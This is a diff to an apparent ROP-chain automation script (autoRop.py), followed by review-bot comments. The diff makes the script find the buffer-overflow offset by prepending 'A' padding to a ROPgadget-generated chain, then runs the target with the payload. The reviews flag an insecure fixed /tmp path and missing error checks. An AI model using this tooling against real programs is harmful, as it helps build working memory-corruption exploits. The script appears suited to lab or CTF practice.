diff --git a/autoRop.py b/autoRop.py
index 3811e04..d1dbc25 100755
--- a/autoRop.py
+++ b/autoRop.py
@@ -72,24 +72,27 @@ def run_program(payload: str, **kwargs) -> process:
 def find_offset_inc(low: int, high: int):
- for i in range(low, high + 1):
- print(f" ├─[🤔] Trying payload {i}...")
- subprocess.run(
- [
- "ROPgadget",
- "--binary", exec_file,
- "--ropchain",
- "--silent",
- "--paddingLen", str(i),
- "--ropFile", rop_file,
- "--execFile", 'rop_exec_default.json',
- ],
- stdout = subprocess.DEVNULL
- )
-
- with open(rop_file, 'rb') as f:
- p = run_program(f.read())
- if b'[ Successful ROP! ]' in p.readall():
+ default_padding = 64
+ print(f" ├─[🤔] Generating offset discovery payload...")
+ subprocess.run(
+ [
+ "ROPgadget",
+ "--binary", exec_file,
+ "--ropchain",
+ "--silent",
+ "--paddingLen", str(default_padding),
+ "--ropFile", '/tmp/rop_file',
+ "--execFile", 'rop_exec_default.json',
+ ],
+ stdout = subprocess.DEVNULL
+ )
+ with open('/tmp/rop_file', 'rb') as f:
+ original_payload = f.read()[default_padding:]
+ for i in range(low, high + 1):
+ print(f" ├─[🤔] Trying offset {i}...")
+ rop_payload = (b'A' * i) + original_payload
+ proc = run_program(rop_payload)
+ if b'[ Successful ROP! ]' in proc.readall():
 print(f" └─[😳] Found offset at {i}!\n")
 return i
@@ -155,13 +158,12 @@ if run:
 atexit.unregister(pwnlibexit._run_handlers)
 pwnlibexit._run_handlers()
- print()
- print(f"[ Run Program : ./{exec_file} {rop_file} ]")
+ print(f"\nExecuting {exec_file}...\n")
 with open(rop_file, 'rb') as f:
- p = run_program(f.read())
+ proc = run_program(f.read())
 if interactive:
 term.init()
- p.interactive()
+ proc.interactive()
 else:
- print(p.recvall().decode('utf-8'))
+ print(proc.recvall().decode('utf-8'))
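Review bot: The new `--ropFile '/tmp/rop_file'` argument and the matching `open('/tmp/rop_file', 'rb')` use a fixed, predictable name in a world-writable directory, so another local user can pre-create or symlink that path and the bytes read back into `original_payload` are no longer the chain ROPgadget just wrote (CWE-377, insecure temporary file). The same `subprocess.run(...)` call has no `check=True` and its stdout is discarded, so a failed ROPgadget run goes unnoticed and a stale or foreign file is read, and the unguarded `f.read()[default_padding:]` slice turns a file shorter than 64 bytes into an empty chain, after which the loop only sends padding and the `[ Successful ROP! ]` check can never match. Writing the chain to a `tempfile.mkstemp()` path (add `import os` and `import tempfile` at the top of the file if they are not already there), passing `check=True`, and validating the length before slicing addresses all three. The placeholder-free `print(f" ├─[🤔] Generating offset discovery payload...")` can be a plain string. The remainder of `find_offset_inc`, including whatever it returns when no offset in `range(low, high + 1)` matches, lies outside the hunk.
```python
    default_padding = 64
    print(" ├─[🤔] Generating offset discovery payload...")
    fd, chain_path = tempfile.mkstemp(prefix="rop_", suffix=".bin")
    os.close(fd)  # ROPgadget opens the path itself; we only need a private, unpredictable name
    try:
        subprocess.run(
            [
                "ROPgadget",
                "--binary", exec_file,
                "--ropchain",
                "--silent",
                "--paddingLen", str(default_padding),
                "--ropFile", chain_path,
                "--execFile", 'rop_exec_default.json',
            ],
            stdout=subprocess.DEVNULL,
            check=True,  # surface a failed ROPgadget run instead of reading a stale file
        )
        with open(chain_path, 'rb') as f:
            chain = f.read()
    finally:
        os.unlink(chain_path)
    if len(chain) <= default_padding:
        raise RuntimeError("ROPgadget produced no chain beyond the padding bytes")
    original_payload = chain[default_padding:]
    # … unchanged: offset loop over range(low, high + 1) …
```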
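Review bot: `print(proc.recvall().decode('utf-8'))` on the last line of the hunk raises `UnicodeDecodeError` as soon as the target emits a byte sequence that is not valid UTF-8, which the raw output of a process under this kind of test can easily contain, and the run then ends with a traceback instead of the captured output. `print(proc.recvall().decode('utf-8', errors='replace'))` keeps the output printable in that case. The new banner `print(f"\nExecuting {exec_file}...\n")` also drops the payload file name that the replaced line reported; `print(f"\nExecuting {exec_file} with {rop_file}...\n")` keeps that in the log. The enclosing `if run:` block begins before the hunk.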